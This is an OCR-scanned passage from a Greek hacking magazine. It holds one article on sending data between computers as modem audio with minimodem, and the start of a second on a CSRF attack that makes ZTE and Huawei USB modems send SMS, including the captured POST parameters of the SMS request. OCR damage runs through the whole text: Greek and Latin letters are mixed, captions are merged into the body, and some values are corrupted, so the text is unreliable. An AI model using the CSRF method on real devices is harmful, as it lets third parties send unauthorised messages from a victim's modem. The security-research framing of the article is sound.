router. H επικοινωνία των υπολογιστών αποτελεἰ πλέον µια καθηµερινἠ διαδικασία 
που τη θεωρούμε δεδομένη και συνήθως περνάει απαρατήρητη. Επιπρόσθετα, στην 
πορεία εισήχθησαν και νέες τεχνολογἱες για την ασύρματη επικοινωνία σε κοντινὲς 
αποστάσεις (βλέπε WiFi ἡ και Bluetooth). 


Στο παρὸν άρθρο σκοπεύουµε να αφήσουμε πίσω µας τα τεχνολογικἁ καλούδια της 
εποχἠς και να παρουσιάσουμε ἑναν διαφορετικὀ τρόπο επικοινωνίας μεταξύ των 
υπολογιστών. Σε GUTO το εγχείρημα δεν θα αξιοποιήσουμε κανένα κλασσικὀ μέσο 
δικτύωσης, παρά μόνο την ἴδια τη "φωνή" των υπολογιστών. Αναρωτιὲστε γιατὶ θα 
ἠθελε να κάνει κάποιος κάτι τέτοιο, EKTOG βεβαίως and τον πανίσχυρο λόγο του "για- 
Ti μπορώ"; Νομίζουμε OT! δεν θα δυσκολευτεἰτε να δώσετε απάντηση μόνοι σας |) 


Τα κυκλώματα του modem σε software 


Το σύστημα που θα υλοποιήσουμε Baoi- 
ζεται στον τρόπο λειτουργίας των ava- ϱ ο 1 1 ο 1 0 0 0 
λογικὠν modems. Τα ψηφιακά δεδομένα 
θα μετατρέπονται σε ηχητικἁ κύματα, θα 
μεταδίδονται µε κἀποιο μέσο μεταφορὰς 
του ἠχου και, στον τελικὀ τους προορι- 
σμὀ, τα κύματα θα μετατρέπονται πάλι 
σε ψηφιακά δεδομένα. Με λίγα λόγια, όχι 
μόνο θα βασιστούμε στη λειτουργία των 


παλιών modems, αλλά θα τα αντιγρά- Frequency Shift Keying (FSK) 
Supe κανονικα! Το βασικό εργαλείο Πτα Frequency-Shift Keying (FSK) ονομάζεται 
πειρἀματά µας θα εἰναι το minimodem. ο τύπος διαμόρφωσης ενός σήματος, στον 
Πρόκειται για Eva πρὀγραμμα Ανοιχτού οποίο Τα bits αντιστοιχούν σε δύο διαφορετι- 
Κώδικα, που για την ώρα τρέχει µόνο σε KEG OUXVO TN TEC: πι ενα OTNV TIHI 
Ε ' fi ; διαδοχικών bits αντιστοιχεί και σε εναλλαγή 
Linux και εἶναι γραμμένο ano τον Kamal της συχνότητας του φέροντος σήματος. 


Mostafa, σε C. Το minimodem ὑυλοποι- 
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εἰ τη διαµόρφωση FSK (Frequency-Shift Keying) και λειτουργεἰ σαν va software 
modem. Μάλιστα, υποστηρίζει µια πλειάδα προτύπων, μεταξὺ των οποίων συγκατα- 
λέγονται τα Bell103, Bell202, RTTY, NOAA SAME και Caller-ID. 


Bell103 300 bps 
Bell202 1200 bps 


NOAA SAME 520 bps 
Caller-ID 1200 bps 


O μέγιστος ρυθμός διαµεταγωγής ava πρότυπο. H µονάδα μέτρησης για Ta μεγέθη της δεύτερης στήλης 
εἶναι Ta bauds per second. Στην περίπτωση της διαμόρφωσης FSK, όμως, κάθε baud αντιστοιχεί σε Eva bit 
πληροφορίας. 


Baud Rate και διαμόρφωση 


H λέξη baud προέρχεται απὀ το ὀνομα του Γάλλου μηχανικού Emile Baudot, ο onoi- 
ος εφηύρε τον κὠδικα 5bit teletype. H έννοια του baud, λοιπὀν, αναφἑρεται σε µια 
µεταβολἠ που µπορεί να πραγµατοποιηθεἰ στο σήμα μετάδοσης. AUTH η µεταβολἡ 
ενδέχεται ν' αφορά στην τάση του σήματος, στη συχνότητα ἡ στη φάση. Από την 
ἄλλη, το baud rate αναφἑρεται στο Ἐμέγιστο ρυθμὀξ µε τον οποἰο μπορούν να 
πραγματοποιούνται αυτὲς οι µεταβολές. H γενικἠ ταύτιση του baud rate ue To ρυθμό 
μεταφορὰς δεδομένων (bit rate) εἰναι λανθασμένη, αφού καθορίζεται ano τη φύση 
των μεταβολών (baud) που αξιοποιούνται κᾶθε φορά. Εν ολίγοις, To αν To baud rate 
ταυτίζεται µε το bit rate εξαρτάται ano τη διαµόρφωση του σήματος. 


Η διαµόρφωση Frequency-Shift Keying προβλέπει τη χρήση δύο διαφορετικών συ- 
χνοτήτων για την αποστολἠ των δεδομένων. Όπως υποψιάζεστε, η µία συχνότητα 
αντιστοιχεἰ στο λογικὀ 0 και άλλη στο λογικό 1. Έτσι, ο μέγιστος ρυθμὸς µε τον 
οποίο μπορεί να μεταβάλλεται η συχνότητα, καθορίζει και TO µἐγιστο ρυθμὀ µεταφο- 
pac bit. Με ἆλλα λόγια, στην περίπτωση Tou FSK το baud rate ταυτίζεται (αριθµητι- 
Kd) µε To bit rate. Όπως sinapse, auTO δεν ισχύει πάντα. H διαµόρφωση Phase-Shift 
Keying (PSK) χρησιμοποιεὶ µεταβολές στη φάση και OX! στη συχνότητα. Σε μία ano 
τις παραλλαγές του PSK (συγκεκριµένα στο QPSK - Quadrature Phase-Shift Keying) 
προβλέπονται τὲσσερα διαφορετικἀ βήματα για τη µεταβολἠ της φάσης, καθένα ano 
τα οποία αντιστοιχεί σε Eva ζεύγος bit. Επομένως, κάθε baud στο QPSK αντιστοιχεἰ 
σε δύο bits! 


Το minimodem δεν χωρίζεται σε server και client. Το ἴδιο πρὀγραμµα µπορεί να EKTE- 
λέσει και τις δύο λειτουργίες. Επιπρόσθετα, η κωδικοποίηση και η αποκωδικοποίηση 
μπορούν να λαμβάνουν χώρα "ζωντανά" ἡ να πραγματοποιούνται ετεροχρονισμµένα. 
Δηλαδή, μπορούμε να κωδικοποιούµε τα δεδομένα σε ἠχο, να τα στέλνουμε aneu- 
θείας στον παραλήπτη κι εκεὶ να γίνεται ἄμεσα η αποκωδικοποίηση, αλλά μπορούμε 
κάλλιστα να χρησιμοποιήσουμε ως ενδιάμεσο Eva αρχείο ἠχου. Όπως αντιλαμβάνε- 
στε, το πρὀγραμμµα λειτουργεἰ ανεξάρτητα του μέσου μετάδοσης των ἠχων. Πα na- 
ράδειγµα, μπορούμε να χρησιμοποιήσουμετα φυσικά ηχητικἁ κύματα, µετη βοήθεια 
ηχείων και των μικροφώνων. Με αυτὀν τον τρόπο, όμως, ενδέχεται να ενοχλήσουμε 
ιδιαιτερα ὁσους βρίσκονται στο ἰδιο δωμάτιο µε μὰς (ενδεχομένως και στα SinAava). 
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Μια ἄλλη επιλογή εἶναι αυτή που βλέπουμε και στο Terminator 3, όταν το μοντέλο 
T-X κάνει update μιλώντας µε Tov server μέσω κινητού τηλεφώνου. Μπορούμε, õn- 
Addn, να χρησιμοποιήσουμε το τηλέφωνο. Πάντως η πιο ἠσυχη και αποδοτικἠ λύση, 
εἶναι να αξιοποιήσουµε τις θύρες line-in και line-out των κυκλωμάτων ἠχου των 
υπολογιστών. 


.- crunchbang@crunchbang: ~ 


crunchban runchbang:~$ sudo apt-get install minimodem 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following NEW packages will be installed: 
minimodem 
© upgraded, 1 newly installed, © to remove and ϐ not upgraded. 
Need to get 16.5 kB of archives. 
After this operation, 77.8 kB of additional disk space will be used. 
Get:1 http://http.debian.net/debian/ wh /main minimodem i386 0.8. 
] 
Fetched 16.5 kB in Os (24.3 kB/s) 
ting previously un ected package minimodem. 
ing database ... 78780 files and directories currently installed.) 
Unpacking minimodem (fr .../minimodem 0.8.1-1_1386.deb) 
Processing triggers for man-db 
Setting u inimodem (0.8.1-1) 
crunchban runchbang:~$ 


H εγκατάσταση του minimodem αποτελεί απλή υπόθεση και στις 
περισσότερες διανομὲς Linux πραγματοποιείται µέσω του επίσημου 
repository. Πάντως, av δεν βρούμε εκεί την τελευταία ἐκδοση του npo- 
γράμματος, μπορούμε να κάνουμε την εγκατάσταση χειροκίνητα. 


Εγκατάσταση και βασικἠ χρήση 


Ας αρχίσουμε να βάζουμε τα πράγµατα σε µια σειρά, ξεκινώντας απὀ την εγκατά- 
σταση του προγράµµατος minimodem. Καταρχάς, για τους σκληροπυρηνικούς xph- 
στες να πούμε ὁτι ο πηγαίος κὠδικας του προγράµµατος διατίθεται στο GitHub, στη 
θέση https://github.com/kamalmostafa/minimodem, ὁπως επἰσης και στη διεύθυνση 
www.whence.com/minimodem/minimodem-@.19.tar.gz. Στις διανομές που βασίζονται στο 
Debian, η εγκατάσταση πραγματοποιείται ως εξἠς: 

sudo apt-add-repository ppa:kamalmostafa/minimodem 

sudo apt-get update 

sudo apt-get install minimodem 
Ακόμα πιο απλά πραγματοποιείται σε διανομὲς nou στηρἰζονται στο Fedora: 

sudo yum install minimodem 


Πα τις ανάγκες του ἄρθρου EPpyaoTNHKAHE σε δύο μηχανήματα µε το αγαπημένο µας 
CrunchBang (81). Σε αυτή τη διανοµἠ η προσθήκη Tou repository για το minimodem 
δεν εἶναι απαραίτητη, καθώς το πακέτο προσφέρεται ano τα "εργοστασιακά" 
repositories. Έτσι, καταφέραμε να το εγκαταστήσουµε ταχύτατα πληκτρολογώντας 


sudo apt-get install minimodem 


Όταν ολοκληρώθηκε η εγκατάσταση του πακέτου, εκτελἐσαµε TO Minimodem ano 
την κονσόλα xwpic καμία παράμετρο. Με αυτὸν τον τρὀπο εμφανίστηκαν πληρο- 
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φορίες για την ἐκδοση, καθώς και ἑνα μικρὸ κείμενο βοήθειας μαζὶ µε τις αποδε- 
KTEG παραμέτρους. Ακριβώς τότε -και σχεδὸν τυχαία οφείλουμε να οµολογήσουμε-, 
συνειδητοποιήσαμε ὁτι η εγκατεστημένη ἐκδοση προσέφερε λιγότερες δυνατότη- 
τες ano εκείνη που εἰχαμε συναντήσει στο δίκτυο. Συμπεράναμε, λοιπὸν, ότι το 
πακέτο του minimodem στο repository του CrunchBang δεν αντιστοιχούσε στην 
τελευταία ἐκδοση του προγράμματος. Κάπως έτσι αποφασίσαμε να προσθέσουμε 
το πρὀγραμμµα χειροκἰνητα, εγκαθιστώντας τα πιο πρόσφατα πακέτα DEB. Συγκεκρι- 
μένα, χρησιμοποιήσαμε το GDebi Package Installer! κι εγκαταστήσαμε τα libfftw3- 
single3_3.3.4-1_i386.deb και minimodem_0.19-1_i386.deb. 


Οι παράμετροι nou μπορεἰ να δεχτεί TO npòypappa εἶναι πάρα πολλὲς. Εκτὸς and την 
επιλογἠ προτύπου, μπορούμε να επιλέξουμε την ταχύτητα μετάδοσης, την ποιότη- 
τα των παραγόμενων ἠχων, το PUBHO δειγματοληψίας των εισερχόμενων NXNTIKMV 
σημάτων και πολλά ἀλλα. Μπορείτε να τσεκάρετετις υποστηριζόμενες παραμέτρους 
στο σχετικὀ Man page ἡ να κάνετε µια βόλτα and κάποιον τόπο σαν τον http://www. 
justmanpage.com/man/minimodem.1. 


Ξεκινήσαμε τους πειραματισμούς µας HE την παράμετρο --tx και σε Eva χαμηλὸ puð- 
HO μετάδοσης, των 100 bps: 

minimodem --tx 100 

hello, world! 
Αμέσως ἑνα γνώριμο γουργουρητὀ ακούστηκε ano τα ηχεία του υπολογιστή µας, 
κάνοντας va μικρὸ χαμόγελο να ζωγραφιστεί στο πρὀσωπὀ µας. Δίχως να χάνου- 
µε πολὺ χρόνο, ανοἰξαµε µια κονσόλα στο δεύτερο μηχάνημα που εἰχαμε στήσει 


crunchbang@crunchbang; ~/images 
runchbang:~/images$ minimodem --tx 100 


CARRIER 100 @ 1 
i lta 


Κάνοντας µια πρώτη δοκιμή 
της επικοινωνίας µέσω των 
ηχείων και του μικροφώ- 
νου, διαπιστώσαμε µε χαρά 
ότι ο παραλήπτης άκουγε 
τα γουργουρητά του ano- 
στολέα και αποκωδικοποι- 
οὐσε το μήνυμα σωστά. 


1. Εργαλείο προσθαφαίρεσης πακέτων DEB που συνοδεύει τη διανομὴ CrunchBang. 


Όταν οι μηχανές apytZouv τη μουρμούρα [μέρος 1ο] 
Αα 


το minimodem και ξεκινήσαμε σε AUTÒ 
µια συνεδρία ακρόασης pE TIG εξἠς απλὲς 
ρυθμίσεις: 


minimodem --tr 100 


Εἶναι αλήθεια ὁτι χρειάστηκε καμπόσος 
χρόνος μέχρι να ρυθµίσουµε σωστά την 
ένταση των ηχείων και την ευαισθησία 
του μικροφώνου, αλλά στο τέλος κατα- 
φέραμε την αξιόπιστη μεταφορὰ δεδο- 
μένων µε PUBHO έως και 150 bps ;) Έτσι, 
όταν ο πρὠτος υπολογιστής εξέπεµψε TO 
"Hello, world!", στην κονσόλα του δεύτε- 
ρου εμφανίστηκαν τα ακόλουθα: A 


### CARRIER 100 @ 1250.0Hz ### 
Δύο anàá καλώδια ήχου µε βύσματα mini-jack 
hello, world! των 3,5 χιλιοστών, εἶναι αρκετά για v' ανεβά- 


B σουµε To baud rate στα 1200bps, ὁπως επίσης 
ἩΗ͂Ε NOCARRIER ndata=14 και για να πετύχουμε την αμφίδρομη επικοινω- 
confidence=@.79 throughput=100.e0e via μεταξύ των υπολογιστών. 


(rate perfect) ### 


Κατεβάζοντας το baud rate σε ακόµα πιο χαμηλά επἰπεδα, διαπιστώσαμε ὁτι η αξιο- 
πιστία της επικοινωνίας μπορούσε να διατηρηθεἰ ακόµα και µε θόρυβο στο δωμάτιο. 
Πάντως, αν και η ταχύτητα των 100 µε 150 bps μάς ¿kave να ξεχαστούμε για αρκετἠ 
ὥρα, στέλνοντας χαρακτήρες απὀ τον Evav υπολογιστή στον ἄλλο, στην πράξη δεν 
εἰναι επαρκἠς για καμία εφαρµογή. Ακόμα και η μετάδοση λίγων KB θα διαρκούσε 
εκνευριστικἁ πολὺ. 


Πα την αύξηση της ταχύτητας απαιτείται βελτίωση του διαύλου επικοινωνἰας κι AUTÒ 
μπορεἰ να επιτευχθεί µε µια απλἠ σύνδεση της εξόδου ἠχου του ενὸς υπολογιστή µε 
την εἶσοδο ἠχου του άλλου. Το καταλληλότερο καλώδιο για το σκοπὸ αυτὸ εἶναι Eva 
καλώδιο ἠχου µε βύσματα mini-jack των 3,5 χιλιοστών. Επιπρόσθετα, µε τη χρήση 
ενὸς δεύτερου καλωδίου απὀ την εἰσοδο του πρώτου στην ἐξοδο του δεύτερου, uno- 
ρούμε να ἐχουμε αμφίδρομη επικοινωνία. Φυσικά, σ' αυτἠ την περίπτωση θα χρει- 
αστούμε δύο κονσόλες σε κάθε σύστημα: Μία για την αποστολἠ δεδοµένων (EKTE- 
λεση του minimodem µε την παράμετρο --tx) και μία για τη λήψη (εκτέλεση του 
minimodem µε την παράμετρο --rx). Με αυτόν τον τρόπο, η ταχύτητα διασύνδεσης 
στα δικἀ µας μηχανήματα έφτασε ως τα 1200 bps µε απὀλυτη αξιοπιστία. Σε uyn- 
λότερα επίπεδα (1800 ~ 2000 bps) τα αποτελἐσματα δεν ἦταν πάντα ικανοποιητικἀ. 


Πλουσιότερη επικοινωνία 
Μετὰ την αποστολἠ μικρῶν μηνυμάτων, το επόμενο βήμα ἦταν η χρήση της διασω- 
λήνωσης για την αξιοποίηση και ἄλλων προγραμμάτων στα πειρἁματὰ µας. Έτσι, 
καταφέραμε να δούμε στην κονσόλα του παραλήπτη την ἐξοδο διαφόρων προγραμ- 
μάτων που ἐτρεχαν στην κονσόλα του αποστολέα. Με τον ἰδιο τρόπο καταφέραμε να 
"εκπέμψουμε" κι ολόκληρα αρχεία: 

cat readme.txt | minimodem --tx 1200 


Σ' GUTO TO σημείο σκεφτἠήκαµε ὁτι η προβολἠ των εισερχόμενων χαρακτήρων στην 
οθόνη Exel πλάκα, αλλά αν χρησιμοποιούσαμε την ανακατεύθυνση προς κάποιο ap- 
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χείο, θα μπορούσαμε va πραγµατοποιήσουµε κανονικές, ασύρματες, αντιγραφέἑς! 
Μόνο που η ἐξοδος του minimodem ενσωματώνει αρκετά περιττά μηνύματα, σαν 
αυτά που εἰδαμε κατὰ την αποστολἠ Tou “hello, world!". Προφανώς, όλα αυτά τα 
"σκουπίδια" θα αλλοίωναν το περιεχόµενο των µεταφερόμενων αρχείων. Κάπως ETO! 
ανατρέξαµε στο man page του minimodem και η αλήθεια εἶναι OT! βρήκαμε τη λύση 
αμέσως. Συγκεκριµένα, συναντήσαμε την παράμετρο -q (ἡ --quiet), η οποία συν- 
δυάζεται µε την --rx κι απενεργοποιεὶ όλα τα μηνύματα ελἐγχου που εμφανίζονταν 
κατά την ἐναρξη και τη λήξη της αποστολἠς. Χρησιμοποιώντας αυτή την παράμε- 
TPO στον υπολογιστή-παραλήπτη, καταφέραμε να µεταφἐέρουµε Eva αρχείο απλού 
κειμένου µε επιτυχία! Μόνο µια µικρή λεπτομέρεια µας δυσαρεστούσε: Κάθε φορά 
που ολοκληρωνόταν µια μεταφορά, ἡμασταν υποχρεωμένοι να τερματἰζουμε χειρο- 
κίνητα το minimodem που ἄκουγε. Έτσι, επιστρἑψαµε στο man page και βρήκαμε 
πάλι τη λύση. Πρόκειται για την παράμετρο --rx-one, η οποία διακόπτει αυτόματα 
την εκτέλεση του minimodem µετά την ολοκλήρωση της μετάδοσης. Συνδυάζοντας 
τα παραπάνω, βάλαμε τον παραλήπτη να περιμένει για τη μετάδοση ενὸς αρχείου µε 
τον εξἠς τρόπο: 


minimodem --rx --rx-one -q > readme.txt 


Κλείνοντας αυτό το πρώτο μέρος TOU μικρού µας αφιερώματος, αξίζει ν' avaMEpou- 
µε δύο ακόµα παραμέτρους: H πρώτη (--file some_file) χρησιμοποιείται σε συνδυα- 
OHO µε την --tx και επιτρέπει την εγγραφἠ του ηχητικού σήματος σε κἄποιο αρχείο. 
H δεύτερη (--samplerate rate_in_Hz) καθορἰζει το ρυθμὀ δειγματοληψίας για την 
επεξεργασἰα των ἠχων. H προεπιλεγµένη Tipů εἶναι στα 48000Hz, αλλά ὁσοι ἐχουν 
(πολὺ) παλιότερο εξοπλισμὀ θα ἠθελαν να την κατεβάσουν. 


Ἴσως ἐχετε παρατηρήσει ὁτι τα τελευταία πειρἀματά µας αφορούσαν στη μεταφορά 
αρχείων απλού κειµένου. Θα μπορούσαμε άραγε να εκπἐμψουµε αρχεἰα οποιουδἠ- 
ποτε εἶδους και να τα συνθέσουµε στο ἄλλο άκρο µε επιτυχία; Φυσικά και γίνεται! Το 
πρὠτο βήμα εἶναι να συνεχίσετε την ανάγνωση του παρὀντος ἄρθρου, πηγαίνοντας 
τώρα στη σελίδα 42. 


crunchbang@crunchbang: ~/images 
crunchbang@crunchbang:~/images$ df -lah | mi dem --tx 


Με την παράμετρο -q uno- 
ρούμε v' απαλλαγούμε ano 
τις πληροφορίες μετάδο- 
σης που ενσωματώνει το 
minimodem στην ἐξοδό 
του. Παρατηρείστε ὁτι µε 
τη χρήση της διασωλήνω- ἳ M 401M 
σης εκτελέσαµε TO df στον 5 ᾿ o 5 
υπολογιστή-αποστολἑα καὶ c 

τα αποτελέσµατα εµφα- 
νίστηκαν στην οθόνη του 
υπολογιστή-παραλήπτη! 


ibang: ~/imagess [] 
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Αληθινό, διασκεδαστικό hacking για όλους! 


By Cr@wTom 


Metagopa κλοπιμαίων µε SMS 
«Αα 


Στο παρελθὀν ἐχουμε ασχοληθεἰ εκτενώς µε τις επιθέσεις σε ασύρματα δίκτυα, 
έχουμε επισημάνει τους πιθανούς κινδύνους κι ἐχουμε παρουσιάσει διάφορες λύσεις 
(βλ., N.X., http://deltahacker.gr/deltacast-s@1ee@9 και http://deltahacker.gr/fear- 
the-reaver). Κάτι αντίστοιχο έχουμε κάνει και µε τα ενσύρματα δίκτυα, αν κι εδώ Ta 
πράγματα εἶναι πιο απλά. (Άλλωστε η εποχἠ του phone freaking και των επιθέσεων 
στα ἴδια τα καλώδια EXE! παρέλθει ανεπιστρεπτἰ :D) Υπάρχουν ὁμως και κάποιες ENI- 
θέσεις ue TIG οποίες δεν έχουμε ασχοληθεἰ καθόλου, αν και στοχεύουν σε συσκευὲς 
που βρίσκονται στη σύγχρονη καθημερινότητα πολλών ανθρώπων. Μιλάμε για τις 
επιθέσεις στα μικροσκοπικἁ USB modems, που µας συνδέσουν στο Internet μέσω 
του δικτύου κινητἠς τηλεφωνίας. Μήπως νομίζετε ὁτι αυτὲς οι συσκευές προσφέἑ- 
ρουν απόλυτη ασφάλεια; Ano τη στιγμὴ που εἶστε αναγνώστες του deltaHacker, 
εἰμαστε βέβαιοι OT! δεν το νομίζετε. Αλλά δεν µένουμµε στο τι πιστεύουμε ἡ στο τι 
μπορεἰ τελικἀ να ισχύει. Πολύ περισσότερο, σ' αυτὀ το άρθρο παρουσιάζουμε µια 
επίθεση σε 36/46 modems, η onoia μάλιστα δουλεύει µε EVA μεγάλο μέρος των 
modems του εἶἰδους. 


Ας πάρουμε τα πράγµατα ano την αρχή. Εδὠ και αρκετά χρόνια οι πάροχοι κινητής 
τηλεφωνίας προσφέρουν Evav εναλλακτικὀ τρόπο σύνδεσης στο Internet, σεοποιον- 
δήποτε δεν θέλει ἡ δεν μπορεί va EXE! πρόσβαση µέσω ενσύρµατης ἠ/και ασύρματης 
σύνδεσης (WiFi). Αυτός ο τρόπος σύνδεσης προβλέπει τη χρήση του δικτύου κινητής 
τηλεφωνίας του εκάστοτε παρὀχου κι επιτυγχάνεται βεβαίως µε τη βοήθεια ειδικὠν 
modems. Πρόκειται για μικρὲς συσκευὲς που θυμίζουν USB flash-drive και δέχονται 
µια κάρτα SIM για τη σύνδεση στο αντίστοιχο δίκτυο. Ένας γενικὀς διαχωρισμός au- 
τῶν των Modems θα μπορούσε να γίνει µε βάση την τεχνολογία κινητής τηλεφωνίας 
που υποστηρίζουν. Έτσι, ἐχουμε τα ευρέως διαδεδομένα και προσιτἁ 3G (ἡ HSPA+) 
modems, καθὠς και τα νεότερα αλλά πιο ακριβά 4G (ἡ LTE) modems. Οι περισσὀτε- 
PEG συσκευὲς του εἶδους προσφέρουν διάφορες "περιφερειακές" λειτουργίες, όπως 
εἶναι η ανάγνωση καρτών micro SD, ο διαμοιρασμὸς της σύνδεσης µέσω WiFi και η 
αποστολἠ SMS. Πάντως, η αγορά των USB modems εἶναι εξαιρετικἀ περιορισμένη 
και υπάρχουν δύο βασικοἰ ανταγωνιστὲς, οι οποίοι κατασκευάζουν τη συντριπτική 
πλειονότητα των συσκευών. Πρόκειται για τις εταιρείες Huawei και ZTE. Οι πάροχοι 
κινητής τηλεφωνίας απευθύνονται σε αυτούς τους κατασκευαστές, προμηθεύονται 
κάποια μοντέλα, φορτώνουν το δικὀ τους λογισμικὀ, βάζουν τη στάμπα τους και τα 
διαθέτουν στο κοινὀ. Δυστυχώς, OUWC, το λογισμικὀ που εγκαθιστούν εἶναι συνήθως 
κακογραμμένο και το ενσωματωμένο web interface διαθέτει πολλά κενἁ ασφαλείας. 
‘Eva ano αυτά θα εκμεταλλευτούμε και στο παρὀν άρθρο, ὁπου θα εξετάσουμε µια 
πολύ συγκεκριμένη επίθεση µε εντυπωσιακἀ αποτελέσµατα. 


Πα τις δοκιμές µας χρησιμοποιήσαμε τα ZTE MF 193A και Huawei E3276. Σημειώστε 
ότι οι δύο συσκευὲς προέρχονταν απὀ διαφορετικούς παρὀχους κινητής τηλεφωνίας 
(ο ἑνας EAANVIKOG κι ο ἄλλος γερμανικὀς), ενώ το λογισμικὀ τους ἦταν αναβαθµι- 
OHEVO στην πιο πρὀσφατη ἐκδοση. Με την ευκαιρία, να πούμε ὁτι οι συσκευές του 
εἰδους δέχονται αναβαθμίσεις μόνον απὀ τους παρὀχους τηλεφωνίας κι OX! GNO τους 
κατασκευαστὲς τους. AUTO εντείνει τα ὀποια προβλήματα. Κάθε φορά που η KaTa- 
σκευάστρια εταιρεία ανακαλύπτει κἀποια ευπάθεια, αντί να φροντίσει για την άμεση 
αντιμετώπισή της, ειδοποιεί τους πελάτες της (τους παρὀχους κινητἠς τηλεφωνίας) 
και η ευπάθεια αντιμετωπίζεται ὁταν KI αν το αποφασίσουν εκεἰνοι (συνήθως μετά 
ano αρκετὸ καιρό). Και για να σας προλάβουμε, OXI, αυτό δεν συμβαίνει μόνο στην 
Ελλάδα. Όπως αναφἑραµε ἠδη, η µία συσκευἠ µας προερχόταν ano πάροχο της Tep- 
μανίας και TO λογισμικὀ της παρουσίαζε τις ἴδιες (σοβαρές) ευπάθειες. 
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a A all orcosmoresc Σε σύνδεση 
«. Χρήση me ση 


Δίκτυο Προφίᾳ Χρήσης Υπηρεσίες Βοήθεια 
@néo sms ρυθμίσεις SMS 
Κατάσταση Ημνια/Ώρα Αποστοβέας/Παραβήπτης Περιεχόμενο Διαγραφή 


nos = 


COSMOTE 


Η σελίδα αποστολἠς σύντομων μηνυμάτων κειµένου (SMS), στο web interface Tou 
modem της ZTE. Στον κώδικα του web UI κρύβονται πολλά καλούδια. Το κυριότερο εἶναι 
µια ευπάθεια CSRF, την οποία μπορούμε να εκμεταλλευτούμε µε πολλούς τρόπους. 


Ενσωματωμένη ευπάθεια 


Τα 30/40 modems συμπεριφέρονται σαν όλα τα υπόλοιπα: Δημιουργούν Eva TonIKO 
δίκτυο classful, εκχωρούν στη συσκευἠ του χρήστη µια διεύθυνση IP κι ορἰζουν τον 
εαυτὀ τους ως gateway και DNS. Με εξαἰρεση τα USB modems που λειτουργούν κι ως 
WiFi hotspot, τα οποία ἄλλωστε αποτελούν μειονότητα, όλα τα υπόλοιπα παρέχουν 
τις υπηρεσίες τους μόνο σε Eva χρήστη τη φορὰ. Ίσως γι' auTO, To web interface 
που ενσωματώνουν εἶναι συνήθως εντελὼς απροστάτευτο. O χρήστης µπορεί να 
συνδεθεί και να επἐμβει σε οποιαδήποτε ρύθμιση παρέἐχει το modem, χωρίς να του 
ζητηθεί κανένα συνθηματικὀ! 


Όπως εἰπαμε προηγουμένως, οι συσκευὲς που εξετάζουμε xouv τη δυνατότητα 
αποστολἠς και λήψης SMS. Τα εισερχόμενα καθώς και τα εξερχόµενα μηνύματα ano- 
θηκεύονται σε μία τοπικὴ βάση δεδομένων και η συνολικἠ τους διαχείριση πραγµα- 
τοποιείται συνήθως απὀ το web interface. Λέμε συνήθως και OX! πάντα, διότι υπάρ- 
χουν και συσκευὲς που συνοδεύονται ano ειδικἀ προγράµµατα για τη διαχείριση 
των μηνυμάτων. Ωστόσο, η συντριπτικἠ πλειονότητα των Modems επιτρέπουν την 
αποστολἠ SMS και ano το web interface. Τελικά, εἶναι φανερό ὁτι η υπηρεσία ano- 
στολἠς μηνυμάτων στηρἰζεται σε µια υποδομή που παραμένει πάντα ξεκλείδωτη (το 
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web interface). Σαν va µην έφτανε αυτό, στα περισσότερα modems της αγοράς! η 
υλοποίηση του web interface και της σχετικἠς λειτουργίας πάσχει ano µια ευπάθεια 
CSRF (Cross-Site Request Forgery). Επιγραμματικἀ, πρὀκειται για µια αδυναμία κατά 
την οποία Eva site παρουσιάζει τυφλή εμπιστοσύνη σε οτιδήποτε Χμοιάζει” va npo- 
έρχεται απὀ κάποιον διαπιστευμένο χρήστηξ. Ἑτσι, αν ο άτυχος χρήστης επισκεφθεἰ 
µια κακόβουλη δικτυακἠ τοποθεσία, αυτή η τοποθεσία θα μπορεί να πραγµατοποιἠ- 
σει σχεδὸν οποιαδήποτε ενέργεια στο site που πάσχει ano CSRF, αφού τα αιτήματα 
θα προέρχονται απὀ τον browser του νόμιμου χρήστη. Αν αυτή η σύντομη παρου- 
σἰαση της αδυναμίας CSRF σας μπέρδεψε, μπορείτε να ανατρέξετε στο άρθρο "Πλα- 
στογραφημένες δικτυακὲς αιτήσεις" του τεύχους 027 ἡ και στη σχετικἠ ανάρτηση 
στο site του περιοδικού (http://deltahacker.gr/cross-site-request-forgery). 


Σε τελικἠἡ ανάλυση, εφὀσον το web interface εἶναι μονίμως ξεκλείδωτο και nå- 
σχει ano CSRF, εἶναι εὐκολο για ἑναν κακόβουλο δικτυακό τόπο να εξαναγκάσει το 
modem να στείλει SMS! Αυτό ακριβώς θα πετύχουμε κι εμεὶς µε την επίθεση που 
ακολουθεί ;) 


Αποστολἠ SMS 


Μπορεί η υπηρεσία αποστολἠς μηνυμάτων να εἶναι ξέφραγο αμπέλι, αλλά η EKHE- 
τἀλλευσή της προὐποθέτει να γνωρίζουμε το πὠς μεταφέρονται τα δεδομένα. Τι 
ακριβώς περιμένει απὀ το χρήστη η υπηρεσία και σε ποια µορφή; Πα να απαντήἠ- 
σουµε σε αυτά τα ερωτήματα συνδεθήκαμε στη σελἰδα αποστολἠς μηνυμάτων του 
web interface και βάλαμε To Burp suite να καταγράφει τη δικτυακἡ κἰνηση. Κατόπιν 
εξετάσαµε τα αιτήµατα POST που ἐστειλε ο browser, για την αποστολἠ ενός μηνύ- 
ματος. Δείτε Eva μέρος ano τα ευρἠματά µας, που παρουσιάζει και το περισσότερο 
ενδιαφέρον: 


basic_apply=Send&phone_number_sender_show Ξ"ο αριθµός τηλεφώνου του 
αποστολέα” ἂδΜ5 (οητεηῖζΞξ"το μήνυμα που OTEAVOULE"&save_msg_ id=O&which_ 
cgi=new_message&encode_type=ASCII&msg εοητεηζξ"κάποιου εἴδους 
KW61LKOTMOTNHON"&phone_number_sender= "ο αριθµός τηλεφώνου του παραλήπτη" 


Όπως βλέπετε το μήνυμα μεταφέρεται σε plain text, ενώ εξίσου καθαρά διακρἰνο- 
νται η κωδικοποίηση του μηνύματος (ASCII), ο αριθμός του αποστολέα καθώς κι 
εκεἰνος του παραλήπτη. Ένα μέγεθος που αρχικἁ µας φάνηκε αυθαίρετο ἦταν το 
msg_content. Κάνοντας μερικὲς δοκιμές, ὁμως, διαπιστώσαμε ὁτι η τιµή του msg_ 
content μεταβαλλόταν σύμφωνα HE TO περιεχόµενο των μηνυμάτων. Έτσι, συμπερά- 
vape ὁτι αποτελούσε κάποια κωδικοποιηµένη μορφή του μηνύματος. Φυσικά, εφὸ- 
σον αυτή η κωδικοποιηµένη μορφή υπήρχε μέσα στο αἴτημα που ἐστελνε ο browser 
του υπολογιστή µας, συμπεράναμε και κάτι ακόμα: H κωδικοποίηση λάμβανε χώρα 
